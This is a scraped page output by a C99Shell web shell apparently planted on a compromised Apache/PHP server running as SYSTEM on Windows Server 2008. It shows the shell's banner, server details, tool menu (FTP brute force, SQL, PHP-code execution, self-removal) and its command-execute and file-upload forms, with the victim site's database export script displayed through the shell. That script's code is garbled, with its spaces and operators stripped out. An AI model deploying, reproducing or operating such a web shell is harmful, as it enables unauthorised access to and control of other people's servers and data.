!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\htdocs\BLA\boletinlegal\admin\normativa\   drwxrwxrwx
Free 8.02 GB of 239.26 GB (3.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     exportar.php (968 B)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
require_once('../../conex.php');
$fecha date("d-m-Y");
$query_reg sprintf("SELECT * FROM normatividad");
$c_reg mysql_query($query_reg) or die(mysql_error());
$totalRows_reg mysql_num_rows($c_reg);

header('Content-type: application/vnd.ms-excel');
header("Content-Disposition: attachment; filename=normativa_$fecha.xls");
header("Pragma: no-cache");
header("Expires: 0");

echo 
"<table border=1> ";
echo 
"<tr> ";
echo 
"<th>Id</th> ";
echo 
"<th>Norma</th> ";
echo 
"<th>Aņo</th> ";
echo 
"<th>Resuelve</th> ";
echo 
"<th>Sector</th> ";
echo 
"<th>Vinculo</th> ";
echo 
"</tr> ";
while(
$row_reg mysql_fetch_assoc($c_reg)){
echo 
"<tr> ";
echo 
"<td>".$row_reg['id']."</td> ";
echo 
"<td>".$row_reg['norma']."</td> ";
echo 
"<td>".$row_reg['ano']."</td> ";
echo 
"<td>".$row_reg['resuelve']."</td> ";
echo 
"<td>".$row_reg['sector']."</td> ";
echo 
"<td>".$row_reg['vinculo']."</td> ";
echo 
"</tr> ";
}
echo 
"</table> ";
?> 





:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--